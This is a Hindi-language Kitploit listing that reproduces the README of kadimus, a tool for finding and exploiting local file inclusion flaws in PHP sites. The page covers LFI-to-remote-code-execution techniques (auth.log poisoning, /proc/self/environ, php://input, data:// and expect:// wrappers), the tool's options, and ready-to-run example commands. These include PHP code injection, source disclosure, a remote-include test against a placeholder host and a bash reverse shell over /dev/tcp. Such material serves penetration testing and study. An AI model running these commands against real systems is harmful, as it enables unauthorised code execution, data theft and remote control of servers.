Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
kadimus — kadimus is a tool to check and exploit lfi vulnerability. | Kitploit
उपकरण/GitHubGitHub/p0cl4bs/kadimus
Vulnerability ScannersCode AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access ToolArchived
GitHubp0cl4bs/kadimus

kadimus

kadimus is a tool to check and exploit lfi vulnerability.

रिपॉजिटरी देखें
5751276 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Rawsec's CyberSecurity Inventory GitHub stars GitHub license

kadimus

LFI स्कैन और शोषण उपकरण

kadimus एक उपकरण है जो LFI कमजोरियों की जाँच और शोषण के लिए है, जिसमें PHP सिस्टम पर ध्यान केंद्रित किया गया है।

विशेषताएँ:

  • सभी URL पैरामीटर की जाँच करें
  • /var/log/auth.log RCE
  • /proc/self/environ RCE
  • php://input RCE
  • data://text RCE
  • expect://cmd RCE
  • स्रोत कोड प्रकटीकरण
  • HTTP अनुरोध के माध्यम से कमांड शेल इंटरफ़ेस
  • प्रॉक्सी समर्थन (socks4://, socks4a://, socks5:// ,socks5h:// और http://)
  • रिमोट कनेक्शन के लिए प्रॉक्सी socks5 समर्थन

संकलन करें:

पहले सुनिश्चित करें कि आपके सिस्टम पर सभी निर्भरताएँ स्थापित हैं: libcurl, libopenssl, libpcre और libssh.

फिर आप रिपॉजिटरी को क्लोन कर सकते हैं, स्रोत कोड प्राप्त करने के लिए:

root@kitploit:~
$ git clone https://github.com/P0cL4bs/kadimus.git
$ cd kadimus

और अंत में:

root@kitploit:~
$ make

विकल्प:

root@kitploit:~
Options:
  -h, --help                    यह सहायता मेनू प्रदर्शित करें

  Request:
    -B, --cookie STRING         कस्टम HTTP कुकी हेडर सेट करें
    -A, --user-agent STRING     सर्वर को भेजने के लिए User-Agent
    --connect-timeout SECONDS   कनेक्शन के लिए अधिकतम अनुमत समय
    --retry NUMBER              यदि कनेक्शन विफल हो तो पुनः प्रयासों की संख्या
    --proxy STRING              कनेक्ट करने के लिए प्रॉक्सी (सिंटैक्स: protocol://hostname:port)

  Scanner:
    -u, --url STRING            स्कैन/शोषण करने के लिए URL
    -o, --output FILE           आउटपुट परिणाम सहेजने के लिए फ़ाइल

  Explotation:
    --parameter STRING          इंजेक्ट शोषण के लिए पैरामीटर नाम
                                (केवल RCE डेटा और स्रोत प्रकटीकरण के लिए आवश्यक)

  RCE:
    -T, --technique=TECH        उपयोग करने के लिए LFI से RCE तकनीक
    -C, --code STRING           निष्पादित करने के लिए कस्टम PHP कोड, php ब्रैकेट के साथ
    -c, --cmd STRING            कमजोर लक्ष्य सिस्टम पर सिस्टम कमांड निष्पादित करें
    -s, --shell                 HTTP अनुरोध के माध्यम से सरल कमांड शेल इंटरफ़ेस

    --connect STRING            कनेक्ट करने के लिए IP/होस्टनाम
    -p, --port NUMBER           कनेक्ट या सुनने के लिए पोर्ट नंबर
    -l, --listen                इनकमिंग कनेक्शन के लिए बाइंड और सुनें

    --ssh-port NUMBER           कमांड इंजेक्शन का प्रयास करने के लिए SSH पोर्ट सेट करें (डिफ़ॉल्ट: 22)
    --ssh-target STRING         SSH होस्ट सेट करें

    RCE उपलब्ध तकनीकें

      environ                   /proc/self/environ का उपयोग करके PHP कोड चलाने का प्रयास
      input                     php://input का उपयोग करके PHP कोड चलाने का प्रयास
      auth                      /var/log/auth.log का उपयोग करके PHP कोड चलाने का प्रयास
      data                      data://text का उपयोग करके PHP कोड चलाने का प्रयास
      expect                    expect://cmd का उपयोग करके कमांड चलाने का प्रयास

    Source Disclosure:
      -S, --source              filter:// का उपयोग करके स्रोत फ़ाइल प्राप्त करने का प्रयास
      -f, --filename STRING     स्रोत प्राप्त करने के लिए फ़ाइल नाम सेट करें [आवश्यक]
      -O FILE                   आउटपुट फ़ाइल सेट करें (डिफ़ॉल्ट: stdout)

उदाहरण:

स्कैनिंग:

root@kitploit:~
./kadimus -u localhost/?pg=contact -A my_user_agent

फ़ाइल का स्रोत कोड प्राप्त करें:

root@kitploit:~
./kadimus -u localhost/?pg=contact -S -f "index.php%00" -O local_output.php --parameter pg

PHP कोड निष्पादित करें:

root@kitploit:~
./kadimus -u localhost/?pg=php://input%00 -C '<?php echo "pwned"; ?>' -T input

कमांड निष्पादित करें:

root@kitploit:~
./kadimus -t localhost/?pg=/var/log/auth.log -T auth -c 'ls -lah' --ssh-target localhost

RFI की जाँच करना:

आप RFI त्रुटियों की भी जाँच कर सकते हैं — बस रिमोट URL को resource/common_files.txt में डालें और उनकी पहचान करने के लिए रीजेक्स, उदाहरण:

root@kitploit:~
/* http://bad-url.com/shell.txt */
<?php echo base64_decode("c2NvcnBpb24gc2F5IGdldCBvdmVyIGhlcmU="); ?>

फ़ाइल में:

root@kitploit:~
http://bad-url.com/shell.txt?:scorpion say get over here

रिवर्स शेल:

root@kitploit:~
./kadimus -u localhost/?pg=contact.php -T data --parameter pg -lp 12345 -c '/bin/bash -c "bash -i >& /dev/tcp/172.17.0.1/1234 0>&1"' --retry-times 0

योगदान

आप कोड के माध्यम से, या दान करके मदद कर सकते हैं। यदि आप कोड के साथ मदद करना चाहते हैं, तो कर्नेल कोड शैली को संदर्भ के रूप में उपयोग करें।

Paypal:

BTC: 1PpbrY6j1HNPF7fS2LhG9SF2wtyK98GSwq

टूल डाउनलोड करें